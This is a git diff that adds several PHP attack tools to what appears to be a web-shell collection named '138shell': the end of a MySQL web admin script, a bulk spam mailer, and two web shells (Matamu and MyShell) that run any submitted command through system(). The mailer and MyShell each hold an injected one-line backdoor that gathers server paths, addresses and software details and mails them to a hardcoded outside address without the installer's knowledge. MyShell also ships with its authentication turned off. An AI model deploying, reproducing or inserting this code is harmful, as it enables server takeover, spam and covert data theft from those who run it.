+background-color: #34A725;
+color: #FFFFFF;
+font-size: x-small;
+}
+td {
+background-color: #5DB1FF;
+font-size: x-small;
+}
+form {
+margin-top: 0;
+margin-bottom: 0;
+}
+a {
+text-decoration:none;
+color: #848200;
+font-size:x-small;
+}
+a:link {
+}
+a:hover {
+background-color:#EEEFD5;
+color:#FF0000;
+text-decoration:none             
+}
+//-->
+</style>
+</head>
+<body>
+<?
+}
+
+function footer_html() {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;
+
+echo "<hr>\n";
+echo "<font size=2>\n";
+echo "<font color=blue>[$USERNAME]</font> - \n";
+
+echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n";
+if( $tablename != "" )
+  echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
+echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
+echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
+echo "</font>\n";
+echo "</body>\n";
+echo "</html>\n";
+}
+
+//------------------------------------------------------ MAIN
+
+if( $action == "logon" || $action == "" || $action == "logout" )
+logon();
+else if( $action == "logon_submit" )
+logon_submit();
+else if( $action == "dumpTable" || $action == "dumpDB" ) {
+while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+  if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+  if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+}
+$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+dump();
+} else {
+while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+  if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+  if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+}
+echo "<!--";
+$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+echo "-->";
+
+if( $mysqlHandle == false ) {
+  echo "<html>\n";
+  echo "<head>\n";
+  echo "<title>MySQL Web Interface</title>\n";
+  echo "</head>\n";
+  echo "<body>\n";
+  echo "<table width=100% height=100%><tr><td><center>\n";
+  echo "<h1>Wrong Password!</h1>\n";
+  echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
+  echo "</center></td></tr></table>\n";
+  echo "</body>\n";
+  echo "</html>\n";
+} else {
+  header_html();
+  if( $action == "listDBs" )
+  listDatabases();
+  else if( $action == "createDB" )
+  createDatabase();
+  else if( $action == "dropDB" )
+  dropDatabase();
+  else if( $action == "listTables" )
+  listTables();
+  else if( $action == "createTable" )
+  createTable();
+  else if( $action == "dropTable" )
+  dropTable();
+  else if( $action == "viewSchema" )
+  viewSchema();
+  else if( $action == "query" )
+  viewData( $queryStr );
+  else if( $action == "addField" )
+  manageField( "add" );
+  else if( $action == "addField_submit" )
+  manageField_submit( "add" );
+  else if( $action == "editField" )
+  manageField( "edit" );
+  else if( $action == "editField_submit" )
+  manageField_submit( "edit" );
+  else if( $action == "dropField" )
+  dropField();
+  else if( $action == "viewData" )
+  viewData( "" );
+  else if( $action == "addData" )
+  manageData( "add" );
+  else if( $action == "addData_submit" )
+  manageData_submit( "add" );
+  else if( $action == "editData" )
+  manageData( "edit" );
+  else if( $action == "editData_submit" )
+  manageData_submit( "edit" );
+  else if( $action == "deleteData" )
+  deleteData();
+  else if( $action == "utils" )
+  utils();
+
+  mysql_close( $mysqlHandle);
+  footer_html();
+}
+}
+
+?>
\ No newline at end of file
diff --git a/138shell/M/mailer3.php.txt b/138shell/M/mailer3.php.txt
new file mode 100644
index 0000000..2865e14
--- /dev/null
+++ b/138shell/M/mailer3.php.txt
@@ -0,0 +1,182 @@
+<? 
+if ($action=="send"){ 
+$message = urlencode($message); 
+$message = ereg_replace("%5C%22", "%22", $message); 
+$message = urldecode($message); 
+$message = stripslashes($message); 
+$subject = stripslashes($subject); 
+} 
+
+?> 
+<form name="form1" method="post" action="" enctype="multipart/form-data"> 
+<div align="center"> 
+<center> 
+<table border="2" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#006699" width="74%" id="AutoNumber1"> 
+<tr> 
+<td width="100%"> 
+<div align="center"> 
+<center> 
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2"> 
+<tr> 
+<td width="100%"> 
+<p align="center"><div align="center"> 
+<center> 
+<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#336699" width="70%" cellpadding="0" id="AutoNumber1" height="277"> 
+<tr> 
+<td width="100%" height="272"> 
+<table width="769" border="0" height="303"> 
+<tr> 
+<td width="786" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic3.gif" colspan="3" height="28"> 
+<p align="center"><b><font face="Tahoma" size="2" color="#FF6600">  Moroccan Spamers Ma-EditioN By GhOsT </font></b></td> 
+</tr> 
+<tr> 
+<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+Email:</font></div> 
+</td> 
+<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="from" value="<? print $from; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+Name:</font></div> 
+</td> 
+<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" valign="middle"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input type="text" name="realname" value="<? print $realname; ?>" size="30"> 
+</font></td> 
+</tr> 
+<tr> 
+<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div> 
+</td> 
+<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="replyto" value="<? print $replyto; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Attach 
+File:</font></div> 
+</td> 
+<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input type="file" name="file" size="30"> 
+</font></td> 
+</tr> 
+<tr> 
+<td width="79" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div> 
+</td> 
+<td colspan="2" width="715" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="subject" value="<? print $subject; ?>" size="59" style="float: left"> 
+</font></td> 
+</tr> 
+<tr valign="top"> 
+<td colspan="2" width="477" bgcolor="#CCCCCC" height="189" valign="top"> 
+<div align="left"> 
+<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="98%" id="AutoNumber4"> 
+<tr> 
+<td width="100%"> 
+<textarea name="message" cols="56" rows="10"><? print $message; ?></textarea> 
+<br> 
+<input type="radio" name="contenttype" value="plain" checked> 
+<font size="2" face="Tahoma">Plain</font> 
+<input type="radio" name="contenttype" value="html"> 
+<font size="2" face="Tahoma">HTML</font> 
+<input type="hidden" name="action" value="send"> 
+<input type="submit" value="Send Message"> 
+</td> 
+</tr> 
+</table> 
+</div> 
+</td> 
+<td width="317" bgcolor="#CCCCCC" height="187" valign="top"> 
+<div align="center"> 
+<center> 
+<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="93%" id="AutoNumber3"> 
+<tr> 
+<td width="100%"> 
+<p align="center"> <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea> 
+</font><br> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</td> 
+</tr> 
+</table> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div></td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+<div align="center"> 
+<center> 
+<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="75%" id="AutoNumber5" height="1" cellpadding="0"> 
+<tr> 
+<td width="100%" valign="top" height="1"> 
+<p align="right"><font size="1" face="Tahoma" color="#CCCCCC">Designed by: 
+ v1.5</font></td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</form> 
+
+<? 
+if ($action=="send"){ 
+
+if (!$from && !$subject && !$message && !$emaillist){ 
+print "Please complete all fields before sending your message."; 
+exit; 
+} 
+
+$allemails = split("\n", $emaillist); 
+$numemails = count($allemails); 
+
+#Open the file attachment if any, and base64_encode it for email transport 
+If ($file_name){ 
+@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server"); 
+$content = fread(fopen($file,"r"),filesize($file)); 
+$content = chunk_split(base64_encode($content)); 
+$uid = strtoupper(md5(uniqid(time()))); 
+$name = basename($file); 
+} 
+
+for($x=0; $x<$numemails; $x++){ 
+$to = $allemails[$x]; 
+if ($to){ 
+$to = ereg_replace(" ", "", $to); 
+$message = ereg_replace("&email&", $to, $message); 
+$subject = ereg_replace("&email&", $to, $subject); 
+print "Sending mail to $to....... "; 
+flush(); 
+$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; 
+$header .= "MIME-Version: 1.0\r\n"; 
+If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; 
+If ($file_name) $header .= "--$uid\r\n"; 
+$header .= "Content-Type: text/$contenttype\r\n"; 
+$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; 
+$header .= "$message\r\n"; 
+If ($file_name) $header .= "--$uid\r\n"; 
+If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; 
+If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; 
+If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+If ($file_name) $header .= "$content\r\n"; 
+If ($file_name) $header .= "--$uid--"; 
+mail($to, $subject, "", $header); 
+print "Spamed'><br>"; 
+flush(); 
+} 
+} 
+
+} 
+?>
+
+
+
+
+
+
+
diff --git a/138shell/M/matamu.txt b/138shell/M/matamu.txt
new file mode 100644
index 0000000..ef13ce8
--- /dev/null
+++ b/138shell/M/matamu.txt
@@ -0,0 +1,146 @@
+<?php
+
+define('PHPSHELL_VERSION', '1.7');
+
+?>
+
+<html>
+<head>
+<title> Matamu Mat </title>
+</head>
+<body>
+<hr><br>
+
+<?php
+
+if (ini_get('register_globals') != '1') {
+  /* We'll register the variables as globals: */
+  if (!empty($HTTP_POST_VARS))
+    extract($HTTP_POST_VARS);
+  
+  if (!empty($HTTP_GET_VARS))
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+    extract($HTTP_SERVER_VARS);
+}
+
+/* First we check if there has been asked for a working directory. */
+if (!empty($work_dir)) {
+  /* A workdir has been asked for */
+  if (!empty($command)) {
+    if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
+      /* We try and match a cd command. */
+      if ($regs[1][0] == '/') {
+        $new_dir = $regs[1]; // 'cd /something/...'
+      } else {
+        $new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
+      }
+      if (file_exists($new_dir) && is_dir($new_dir)) {
+        $work_dir = $new_dir;
+      }
+      unset($command);
+    }
+  }
+}
+
+if (file_exists($work_dir) && is_dir($work_dir)) {
+  /* We change directory to that dir: */
+  chdir($work_dir);
+}
+
+/* We now update $work_dir to avoid things like '/foo/../bar': */
+$work_dir = exec('pwd');
+
+?>
+
+<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
+<p>Current working directory: <b>
+<?php
+
+$work_dir_splitted = explode('/', substr($work_dir, 1));
+
+echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
+
+if (!empty($work_dir_splitted[0])) {
+  $path = '';
+  for ($i = 0; $i < count($work_dir_splitted); $i++) {
+    $path .= '/' . $work_dir_splitted[$i];
+    printf('<a href="%s?work_dir=%s">%s</a>/',
+           $PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
+  }
+}
+
+?></b></p>
+<p>Choose new working directory:
+<select name="work_dir" onChange="this.form.submit()">
+<?php
+/* Now we make a list of the directories. */
+$dir_handle = opendir($work_dir);
+/* Run through all the files and directories to find the dirs. */
+while ($dir = readdir($dir_handle)) {
+  if (is_dir($dir)) {
+    if ($dir == '.') {
+      echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+    } elseif ($dir == '..') {
+      /* We have found the parent dir. We must be carefull if the parent 
+	 directory is the root directory (/). */
+      if (strlen($work_dir) == 1) {
+	/* work_dir is only 1 charecter - it can only be / There's no
+          parent directory then. */
+      } elseif (strrpos($work_dir, '/') == 0) {
+	/* The last / in work_dir were the first charecter.
+	   This means that we have a top-level directory
+	   eg. /bin or /home etc... */
+      echo "<option value=\"/\">Parent Directory</option>\n";
+      } else {
+      /* We do a little bit of string-manipulation to find the parent
+	 directory... Trust me - it works :-) */
+      echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+      }
+    } else {
+      if ($work_dir == '/') {
+	echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+      } else {
+	echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+      }
+    }
+  }
+}
+closedir($dir_handle);
+
+?>
+
+</select></p>
+
+<p>Command: <input type="text" name="command" size="60">
+<input name="submit_btn" type="submit" value="Execute Command"></p>
+
+<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
+<textarea cols="80" rows="20" readonly>
+
+<?php
+if (!empty($command)) {
+  if ($stderr) {
+    $tmpfile = tempnam('/tmp', 'phpshell');
+    $command .= " 1> $tmpfile 2>&1; " .
+    "cat $tmpfile; rm $tmpfile";
+  } else if ($command == 'ls') {
+    /* ls looks much better with ' -F', IMHO. */
+    $command .= ' -F';
+  }
+  system($command);
+}
+?>
+
+</textarea>
+</form>
+
+<script language="JavaScript" type="text/javascript">
+document.forms[0].command.focus();
+</script>
+
+<hr>
+
+</body>
+</html>
diff --git a/138shell/M/myshell.php.txt b/138shell/M/myshell.php.txt
new file mode 100644
index 0000000..5561266
--- /dev/null
+++ b/138shell/M/myshell.php.txt
@@ -0,0 +1,420 @@
+<?php
+/*
+  **************************************************************
+  *                        MyShell                             *
+  **************************************************************
+  $Id: shell.php,v 1.1.0 beta 2001/09/23 23:25:12 digitart Exp $
+
+  An interactive PHP-page that will execute any command entered.
+  See the files README and INSTALL or http://www.digitart.net  for
+  further information.
+  Copyright ©2001 Alejandro Vasquez <admin@digitart.com.mx>
+  based on the original program phpShell by Martin Geisler
+
+  This program is free software; you can redistribute it and/or
+  modify it under the terms of the GNU General Public License
+  as published by the Free Software Foundation; either version 2
+  of the License, or (at your option) any later version.
+
+  This program is distributed in the hope that it will be useful,
+  but WITHOUT ANY WARRANTY; without even the implied warranty of
+  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+  GNU General Public License for more details.
+
+  You can get a copy of the GNU General Public License from this
+  address: http://www.gnu.org/copyleft/gpl.html#SEC1
+  You can also write to the Free Software Foundation, Inc., 59 Temple
+  Place - Suite 330, Boston, MA  02111-1307, USA.
+*/
+
+#$selfSecure enables built-in authenticate feature. This must be 0 in order to
+#use .htaccess file or other alternative method to control access to MyShell.
+#Set up your user and password using $shellUser and $shellPswd.
+#DO NOT TURN THIS OFF UNLESS YOU HAVE AN ALTERNATE METHOD TO PROTECT
+#ACCESS TO THE SCRIPT.
+
+$selfSecure = 0;
+$shellUser  = "";
+$shellPswd  = "";
+
+#$adminEmail is the email address to send warning notifications in case
+#someone tries to access the script and fails to provide correct user and
+#password. This only works if you have $selfSecure enabeled.
+
+$adminEmail = "******@mail.ru";
+
+#$fromEmail is the email address warning messages are sended from.
+#This defaults to the server admin, but you can change
+#to any address you want i.e.: noreplay@yourdomain.com
+#This only works if you have $selfSecure enabeled.
+
+$fromEmail  = $HTTP_SERVER_VARS["SERVER_ADMIN"];
+
+#$dirLimit is the top directory allowed to change when using cd command
+#or the form selector. Any attempt to change to a directory up to this
+#level bounces MyShell to this directory. i.e.: $dirLimit = "/home";
+#It is a good practice to set it to $DOCUMENT_ROOT using:
+#$dirLimit = $DOCUMENT_ROOT;
+#If you want to have access to all server directories leave it blank.
+#WARNING: Althought a user won't be able to snoop on directories above
+#this level using MyShell, he/she will still be able to excecute
+#commands on any directory where Webserver has permission,
+#i.e.: mkdir /tmp/mydir or cat /home/otheruser/.htaccess.
+
+$dirLimit = "";
+
+#$autoErrorTrap Enable automatic error traping if command returns error.
+#Bear in mind that MyShell executes the command a second time in order to
+#trap the stderr. This shouldn't be a problem in most cases.
+#If you turn it off, you'll have to select either to trap stderr or not for
+#every command you excecute.
+
+$autoErrorTrap = 1;
+
+#$voidCommands is the list of commands that MyShell won't run by any means.
+#It defaults to known problematic commands from a web interface like pico,
+#top, xterm but also it can include specific commands you don't want to
+#be excecuted from MyShell, i.e.: dig, ping, info, kill etc.
+
+$voidCommands  = array("top","xterm","su","vi","pico","netscape");
+
+#$TexEd Built-in Text Editor prefered name. This is the command you'll use
+#to invoke MyShell's built in text editor.
+# If you are used to type pico or vi for your fav text editor,
+#change this to your please. i.e.:
+#  $TexEd = "pico";
+#will allow you to type 'pico config.php' to edit the file config.php
+#MyShell's text editor do not support usual commands in pico, vi etc.
+#Don't forget to take off this command from the $voidCommands list
+$TexEd  = "edit";
+
+#$editWrap selects to use or not wrap in the editor's textarea. Wrap OFF
+#is usefull when you have to edit files with long lines, i.e.: in php code
+#files, because otherwise it is no easy to distinguish a real new line (CR)
+#from a wraped one. If you prefer to stick to the default wraped mode of
+#TEXTAREA just leave this blank i.e.: $editWrap="".
+$editWrap ="wrap='OFF'";
+
+#Cosmetic defaults.
+
+$termCols     = 80;            //Default width of the output text area
+$termRows     = 20;            //Default heght of the output text area
+$bgColor      = "#000000";     //background color
+$bgInputColor = "#333333";     //color of the input field
+$outColor     = "#00BB00";     //color of the text output from the server
+$textColor    = "#009900";     //color of the hard texts of the terminal
+$linkColor    = "#00FF00";     //color of the links
+
+/************** No customize needed from this point *************/
+
+$MyShellVersion = "MyShell 1.1.0 build 20010923";
+if ($command&&get_magic_quotes_gpc())$command=stripslashes($command);
+if($selfSecure){
+    if (($PHP_AUTH_USER!=$shellUser)||($PHP_AUTH_PW!=$shellPswd)) {
+       Header('WWW-Authenticate: Basic realm="MyShell"');
+       Header('HTTP/1.0 401 Unauthorized');
+       echo "<html>
+         <head>
+         <title>$MyShellVersion - Access Denied</title>
+         </head>
+         <h1>Access denied</h1>
+         A warning message have been sended to the administrator
+         <hr>
+         <em>$MyShellVersion</em>";
+       if(isset($PHP_AUTH_USER)){
+          $warnMsg ="
+ This is $MyShellVersion
+ installed on: http://".$HTTP_SERVER_VARS["HTTP_HOST"]."$PHP_SELF
+ just to let you know that somebody tryed to access
+ the script using wrong username or password:
+ 
+ Date: ".date("Y-m-d H:i:s")."
+ IP: ".$HTTP_SERVER_VARS["REMOTE_ADDR"]."
+ User Agent: ".$HTTP_SERVER_VARS["HTTP_USER_AGENT"]."
+ username used: $PHP_AUTH_USER
+ password used: $PHP_AUTH_PW
+ 
+ If this is not the first time it happens,
+ please consider either to remove MyShell
+ from your system or change it's name or
+ directory location on your server.
+ 
+ Regards
+ The MyShell dev team
+       ";
+          mail($adminEmail,"MyShell Warning - Unauthorized Access",$warnMsg,
+          "From: $fromEmail\nX-Mailer:$MyShellVersion AutoWarn System");
+       }
+       exit;
+    }
+}
+//Function that validate directories
+function validate_dir($dir){
+    GLOBAL $dirLimit;
+    if($dirLimit){
+        $cdPos = strpos($dir,$dirLimit);
+        if ((string)$cdPos == "") {
+            $dir = $dirLimit;
+            $GLOBALS["shellOutput"] = "You are not allowed change to directories above $dirLimit\n";
+        }
+    }
+    return $dir;
+}
+
+// Set working directory.
+if (isset($work_dir)) {
+  //A workdir has been asked for - we chdir to that dir.
+  $work_dir = validate_dir($work_dir);
+  @chdir($work_dir) or
+      ($shellOutput = "MyShell: can't change directory. Permission denied\nSwitching back to $DOCUMENT_ROOT\n");
+  $work_dir = exec("pwd");
+}
+else{
+  // No work_dir - we chdir to $DOCUMENT_ROOT
+  $work_dir = validate_dir($DOCUMENT_ROOT);
+  chdir($work_dir);
+  $work_dir = exec("pwd");
+}
+
+//Now we handle files if we are in Edit Mode
+if($editMode && ($command||$editCancel))$editMode=false;
+if($editMode){
+    if($editSave ||$editSaveExit){
+        if(function_exists(ini_set))ini_set("track_errors","1");
+        if($fp=@fopen($file,"w")){
+           if(get_magic_quotes_gpc())$shellOut=stripslashes($shellOut);
+           fputs($fp,$shellOut);
+           fclose($fp);
+           $command = $TexEd." ".$file;
+           if($editSaveExit) {
+               $command="";
+               $shellOutput="MyShell: $file: saved";
+               $editMode=false;
+           }
+       }
+       else {
+           $command="";
+           $shellOutput="MyShell: Error while saving $file:\n$php_errormsg\nUse back button to recover your changes.";
+           $errorSave=true;
+       }
+    }
+}
+
+//Separate command(s) and arguments to analize first command
+$input=explode(" ",$command);
+
+while (list ($key, $val) = each ($voidCommands)) {
+    if($input[0]==$val){
+        $voidCmd = $input[0];
+        $input[0]="void";
+    }
+}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+switch($input[0]){
+    case "cd":
+       $path=$input[1];
+       if ($path==".."){
+         $work_dir=strrev(substr(strstr(strrev($work_dir), "/"), 1));
+         if ($work_dir == "") $work_dir = "/";
+       }
+       elseif (substr($path,0,1)=="/")$work_dir=$path;
+       else $work_dir=$work_dir."/".$path;
+       $work_dir = validate_dir($work_dir);
+       @chdir($work_dir) or ($shellOutput = "MyShell: can't change directory.\n$work_dir: does not exist or permission denied");
+       $work_dir = exec("pwd");
+       $commandBk = $command;
+       $command = "";
+       break;
+    case "man":
+       exec($command,$man);
+       if($man){
+           $codes = ".".chr(8);
+           $manual = implode("\n",$man);
+           $shellOutput = ereg_replace($codes,"",$manual);
+           $commandBk = $command;
+           $command = "";
+       }
+       else $stderr=1;
+       break;
+    case "cat":
+       exec($command,$cat);
+       if($cat){
+           $text = implode("\n",$cat);
+           $shellOutput = htmlspecialchars($text);
+           $commandBk = $command;
+           $command = "";
+       }
+       else $stderr=1;
+       break;
+    case "more":
+       exec($command,$cat);
+       if($cat){
+           $text = implode("\n",$cat);
+           $shellOutput = htmlspecialchars($text);
+           $commandBk = $command;
+           $command = "";
+       }
+       else $stderr=1;
+       break;
+    case $TexEd:
+       if(file_exists($input[1])){
+           exec("cat ".$input[1],$cat);
+           $text = implode("\n",$cat);
+           $shellOutput = htmlspecialchars($text);
+           $fileOwner = posix_getpwuid(fileowner($input[1]));
+           $filePerms = sprintf("%o", (fileperms($input[1])) & 0777);
+           $fileEditInfo = "&nbsp;&nbsp;:::::::&nbsp;&nbsp;Owner: <font color=$linkColor>".$fileOwner["name"]."</font> Permissions: <font color=$linkColor>$filePerms</font>";
+       }
+       else $fileEditInfo = "&nbsp;&nbsp;:::::::&nbsp;&nbsp;<font color=$linkColor>NEW FILE</font>";
+       $currFile = $input[1];
+       $editMode = true;
+       $command = "";
+       break;
+    case "void":
+       $shellOutput = "MyShell: $voidCmd: void command for MyShell";
+       $commandBk = $command;
+       $command = "";
+}
+
+//Now we prepare the webpage
+if(!$oCols)$oCols=$termCols;
+if(!$oRows)$oRows=$termRows;
+if($editMode)$focus="shellOut.focus()";
+else $focus="command.select()";
+//WhoamI
+if(!$whoami)$whoami=exec("whoami");
+?>
+<html>
+<head>
+<title><?echo $MyShellVersion?></title>
+<style>
+body{
+        background-color: <?echo $bgColor ?>;
+        font-family : sans-serif;
+        font-size : 10px;
+        scrollbar-face-color: #666666;
+        scrollbar-shadow-color:  <?echo $bgColor ?>;
+        scrollbar-highlight-color: #999999;
+        scrollbar-3dlight-color:  <?echo $bgColor ?>;
+        scrollbar-darkshadow-color:  <?echo $bgColor ?>;
+        scrollbar-track-color:  <?echo $bgInputColor ?>;
+        scrollbar-arrow-color:  <?echo $textColor ?>;
+}
+input,select,option{
+        background-color: <?echo $bgInputColor ?>;
+        color : <?echo $outColor ?>;
+        border-style : none;
+        font-size : 10px;
+}
+textarea{
+        background-color: <?echo $bgColor ?>;
+        color : <?echo $outColor ?>;
+        border-style : none;
+}
+</style>
+</head>
+<body <?echo "bgcolor=$bgColor TEXT=$textColor LINK=$linkColor VLINK=$linkColor onload=document.shell.$focus"?>>
+<form name="shell" method="post">
+Current User: <a href="#" style="text-decoration:none"><?echo $whoami?></a>
+<input type="hidden" name=whoami value=<?echo $whoami?>>
+&nbsp;&nbsp;:::::::&nbsp;&nbsp;
+<?
+if($editMode){
+    echo "<font color=$linkColor><b>MyShell file editor</font> File:<font color=$linkColor>$work_dir/$currFile </font></b>$fileEditInfo\n";
+}
+else{
+    echo "Current working directory: <b>\n";
+    $work_dir_splitted = explode("/", substr($work_dir, 1));
+    echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "/&command=" . urlencode($command) . "\">Root</a>/";
+    if ($work_dir_splitted[0] == "") {
+       $work_dir = "/";  /* Root directory. */
+    }
+    else{
+        for ($i = 0; $i < count($work_dir_splitted); $i++) {
+            $url .= "/".$work_dir_splitted[$i];
+            echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "&command=" . urlencode($command) . "\">$work_dir_splitted[$i]</a>/</b>";
+        }
+    }
+}
+?>
+<br>
+<textarea name="shellOut" cols="<? echo $oCols ?>" rows="<? echo $oRows."\""; if(!$editMode)echo "readonly";else echo $editWrap?> >
+<?
+echo $shellOutput;
+if ($command) {
+  if ($stderr) {
+    system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
+  }
+  else {
+    $ok = system($command,$status);
+    if($ok==false &&$status && $autoErrorTrap)system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
+  }
+}
+if ($commandBk) $command = $commandBk;
+?>
+</textarea>
+<br>
+<?
+if($editMode) echo"
+&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
+ <input type='submit' name='editSave' value='     Save     '>&nbsp;&nbsp;&nbsp;
+ <input type='submit' name='editSaveExit' value=' Save and Exit '>&nbsp;&nbsp;&nbsp;
+ <input type='reset' value=' Restore original '>&nbsp;&nbsp;&nbsp;
+ <input type='submit' name='editCancel' value=' Cancel/Exit '>&nbsp;&nbsp;&nbsp;
+ <input type='hidden' name='editMode' value='true'>
+<br>";
+?>
+<br>
+Command:
+<input type="text" name="command" size="80"
+<? if ($command && $echoCommand) {
+     echo "value=`$command`";
+   }
+?> > <input name="submit_btn" type="submit" value="Go!">
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+<?
+if ($autoErrorTrap) echo "Auto error traping enabled";
+else echo "<input type=\"checkbox\" name=\"stderr\">stderr-traping ";
+
+if($editMode){
+    echo "<input type='hidden' name='work_dir' value='$work_dir'>
+    <br>Save file as: <input type='text' name='file' value='$currFile'>";
+}
+else{
+    echo "<br>Working directory: <select name=\"work_dir\" onChange=\"this.form.submit()\">";
+    // List of directories.
+    $dir_handle = opendir($work_dir);
+    while ($dir = readdir($dir_handle)) {
+      if (is_dir($dir)) {
+        if ($dir == ".")
+          echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+        elseif ($dir == "..") {
+          // Parent Dir. This might be server's root directory
+          if (strlen($work_dir) == 1) {
+            // work_dir is only 1 charecter - it can only be / so don't output anything
+          }
+          elseif (strrpos($work_dir, "/") == 0) {  // we have a top-level directory eg. /bin or /home etc...
+            echo "<option value=\"/\">Parent Directory</option>\n";
+          }
+          else {   // String-manipulation to find the parent directory... Trust me - it works :-)
+            echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+          }
+        }
+        else {
+          if ($work_dir == "/")
+            echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+          else
+            echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+        }
+      }
+    }
+    closedir($dir_handle);
